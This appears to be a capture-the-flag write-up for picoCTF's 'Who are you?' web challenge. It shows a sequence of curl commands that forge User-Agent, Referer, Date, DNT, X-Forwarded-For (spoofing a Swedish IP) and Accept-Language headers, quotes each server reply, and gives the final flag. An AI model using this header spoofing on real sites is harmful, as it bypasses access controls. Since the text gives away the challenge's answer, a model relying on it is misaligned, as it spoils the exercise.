Edit

Who are you?

Problem

Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn http://mercury.picoctf.net:38322/

Solution

  1. Resources: HTTP RFC / MDN HTTP Headers / Language Code Table / Sweden IP Address Ranged

  2. curl http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> Only people who use the official PicoBrowser are allowed on this site!

  3. curl --user-agent "picobrowser" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> I don&#39;t trust users visiting from another site.

  4. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> Sorry, this site only worked in 2018.

  5. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> I don&#39;t trust users who can be tracked.

  6. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> This website is only for people from Sweden.

  7. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> You&#39;re in Sweden but you don&#39;t speak Swedish?

  8. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> What can I say except, you are welcome

  9. Final command: curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep "<b>.*</b>" --> picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}

Flag

picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}

PreviousWeb Gauntlet 3NextX marks the spot

Last updated

Was this helpful?